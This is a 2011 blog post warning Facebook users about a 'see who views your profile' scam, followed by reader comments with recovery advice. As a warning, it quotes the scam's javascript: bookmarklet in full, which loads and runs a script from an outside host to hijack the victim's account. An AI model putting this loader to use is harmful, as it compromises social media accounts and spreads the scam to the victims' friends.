Checkout Your PROFILE Stalkers [Facebook Scam]

If you happen to see your friends on Facebook share a link on their wall which says “OMG! Its unbeliveable now you can get to know who views your facebook profile.. i can see my top profile visitors and i am so shocked that my EX is still creeping my profile every hour” with a link to profile-viewer.co.cc, please don’t fall for this scam.

Checkout Your Profile Stalkers Scam

The link claims to show who has been stalking your profile, and to make it look legitimate, the website even tells you a random number of people who are viewing your profile from your city. The page uses your IP to find your location and use this information to dupe you. They ask you to copy a javascript code and paste it into the location bar of your browser.

{code type=php}javascript:(a=(b=document).createElement(‘script’)).src=’//motivationalstories.info/us/js.js?’+Math.random(),b.body.appendChild(a);void(0){/code}

Checkout Your Profile Stalkers Scam - Warning

Do not copy the above code into your location bar. It will hijack your account, and post the same message to your friends. Such “find out who viewed my profile” scams seem to be fairly common nowadays on Facebook, and innocent users get their accounts compromised by falling for this trick. Facebook API doesn’t provide data for any applications to tell who has been stalking your profile. Please spread this message, and if you have already fallen victim to this scam, make sure you delete all the traces of this scam from your profile, change your password and inform your friends about the incident. It might even automatically like some random Facebook pages.

This post was published by on May 14, 2011

About the Author: Thilak Rao works as a Social Media Expert. He is one of the first professional bloggers from India, and he loves to write, travel and click photos. Follow him on Twitter @thilak

  • Jimmy_Connely

    Does this any long term damage to your computer? Is there a way to get rid of it?

  • http://tech-buzz.net Thilak Rao

    As far as I know, scripts like these “like” a dozen pages on your behalf
    and possible even posts things on your friends wall on your behalf
    without permission. The best thing to do is, change your password, so
    that tokens are reset prevent them from accessing your account and
    deleted all the traces of this scam from your profile. Otherwise, your
    friends would also fall for this scam.

    Then check your fan pages, if you have joined any unknown fanpages, just
    unlike them.